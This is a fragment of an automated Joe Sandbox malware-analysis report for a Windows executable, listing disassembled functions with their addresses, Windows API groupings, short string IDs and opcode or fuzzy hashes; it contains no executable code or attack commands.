                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                            • Instruction ID: 378c03e84f77a87f3622df6af00345897775104ea52b617f689831a44161b31e
                                                            • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                            • Instruction Fuzzy Hash: 1C1130AA60CB4186EB00AB26F81032AA7A4EF85BC1F985436DF4D4B758CF3DD445C712
                                                            Function 00007FF7EC192ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                            • Instruction ID: 9e37665a992c95bdf5e587ac50957431bce7b1ca3b64e8eae2d7ede754af40cf
                                                            • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                            • Instruction Fuzzy Hash: D011C8A6A08A4282EB25BF28F444379A760FF84B45F844073D94E47298DF7CD589C322
                                                            Function 00007FF7EC1A0008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A003C
                                                            • TerminateThread.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A0047
                                                            • WaitForSingleObject.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A0055
                                                            • ~SyncLockT.VCCORLIB ref: 00007FF7EC1A005E
                                                              • Part of subcall function 00007FF7EC19F7B8: CloseHandle.KERNEL32(?,?,?,00007FF7EC1A0063,?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC19F7C9
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A006A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3142591903-0
                                                            • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                            • Instruction ID: ed5095163f39c8c5ac09b3122dba4812ec957afb2cd0ffaeb42af3921a4e66e5
                                                            • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                            • Instruction Fuzzy Hash: A10125BAA08A4186E740AF15F44032AB760FB88B91F944036DB8E43B69DF3CD896C751
                                                            Function 00007FF7EC1222E8 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                            • Instruction ID: fe944f056a2011ac8bf9472a768a2fd642c94912d2be738d795fb89167c3193f
                                                            • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                            • Instruction Fuzzy Hash: ED015EAD908642D5F7587B12BD84339BB66BF09BA1F984132D42E0A2A4CF7DA444C322
                                                            Function 00007FF7EC151DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID:
                                                            • API String ID: 1611280651-0
                                                            • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                            • Instruction ID: ccad231082482adff90b086c1be8e705154b0f6ac768d3fd0e57f5f6b6c1a87a
                                                            • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                            • Instruction Fuzzy Hash: 74012199B0864292EA05BB24A44437CA662FF40B76FE01736D73E026D5DF3CA854C311
                                                            Function 00007FF7EC1903F8 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                            • Instruction ID: 242763defbb9d49e5bdbf6c7e8cd3a7a5aeaa0f0a70b11f66fc4e2c4aeec495d
                                                            • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                            • Instruction Fuzzy Hash: F1F039D8F1860282FB143BBA784837897966F8CB43FC45077C81A03256DD3DA499C622
                                                            Function 00007FF7EC19B5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                            • Instruction ID: c81ef4ac3c803c82f21af6eb5f4fa219f0df154f6504447b70fa39d183f74a26
                                                            • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                            • Instruction Fuzzy Hash: 94F06DDCF1860282FB643BBA784837896567F48783FC45073C90B42299DD7DA49AC662
                                                            Function 00007FF7EC1A5F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 3769357847-24824748
                                                            • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                            • Instruction ID: 983eca5dc2bb755a0d2a0d009857fba5753e56f4573bd3fce63d327c8ebe496d
                                                            • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                            • Instruction Fuzzy Hash: F5D14BBAB08A56C5EB14EF66E0902AD77B0EB48BC8B888033DE4D47B59DF39D445C351
                                                            Function 00007FF7EC160040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                            • Instruction ID: a33da9665a8892b24e28db6969270f58d636d91dc2eb72e73cec1fd3994cc709
                                                            • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                            • Instruction Fuzzy Hash: 2F818FFAD08202C6FB647F15A550379B6A0AF12784F84803FDA2E576C0DB7DE950D62B
                                                            Function 00007FF7EC156148 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$acos
                                                            • API String ID: 1156100317-2870037509
                                                            • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                            • Instruction ID: ba96ce6d2e6b71a475c3cc358a96055ab16424a89519c6edf5aac645e00f0083
                                                            • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                            • Instruction Fuzzy Hash: 9861F965D28F4589E2239F38782037AEB54BFA63C0F508337EA5E35A64DF3CA042C651
                                                            Function 00007FF7EC156408 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$asin
                                                            • API String ID: 1156100317-2188059690
                                                            • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                            • Instruction ID: bfc029cf1d35a52428780a2e049208184e4b1c068e8dcc9cbbf51a2d0a5dc1c5
                                                            • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                            • Instruction Fuzzy Hash: 5C61C9A5C28F8185E213DF38781137ADB54AF963D1F508333EA5E35A69DF3CA042C651
                                                            Function 00007FF7EC18EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                            • Instruction ID: fc2de5595dea91ac8a8653554ef2b9d7b9a2e4655e515c58437034c534ef8f95
                                                            • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                            • Instruction Fuzzy Hash: B451CFBB61868182E720EF56F480AAAF761FBC8B84F810036EE4D57B49DE7CD505CB11
                                                            Function 00007FF7EC19A6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: P
                                                            • API String ID: 135850232-3110715001
                                                            • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                            • Instruction ID: c639dc18f2ef62d378aa8764fec4873a9419da39a76ec26978be99047d9cbdc2
                                                            • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                            • Instruction Fuzzy Hash: E74117B6A04A8181E710EB19E4043ADA762FB84B60F968272DA6D037C1DF3DE456C722
                                                            Function 00007FF7EC15EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                            • Instruction ID: 9feac7a873130ac09d600b9b679c59429bfb15903ee93935bef581f38609c7bf
                                                            • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                            • Instruction Fuzzy Hash: 4141B166E1C64186EB20DF15F4453AAB7A1FB88795F804132EE4E87788DF7CD401C751
                                                            Function 00007FF7EC1CAB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateObjectStock
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2671490118-1439706946
                                                            • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                            • Instruction ID: 69237c3ccfb8a79a29da291b2556b10473f2de786ec068f4f1d2f09ec40055b1
                                                            • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                            • Instruction Fuzzy Hash: 04417C766086C28BE330DF55F444B9AB7A0FB88790F504226EAA903A99DF3CD485CF10
                                                            Function 00007FF7EC1CA1F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateMoveObjectStock
                                                            • String ID: Listbox
                                                            • API String ID: 3747482310-2633736733
                                                            • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                            • Instruction ID: 56679813e44d9c66d17f8280c9730023697d7fd9bc9f410d7267343dd70f8861
                                                            • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                            • Instruction Fuzzy Hash: BA315A766087C186E770DF16B844B5AB7A5F7887A0F509226EAA903B99CB3DD481CF10
                                                            Function 00007FF7EC1A4DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: %lu
                                                            • API String ID: 2507767853-685833217
                                                            • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                            • Instruction ID: d2c766fac70193ac5b283aeec6c3baa1e9de3b52cb359cc371c650051f521d73
                                                            • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                            • Instruction Fuzzy Hash: 513181BA608B8686DB10EB16F4402ADB7A1FB89BC0F804032EE8D43B69DF7CD555C711
                                                            Function 00007FF7EC1CB104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 1025951953-1010561917
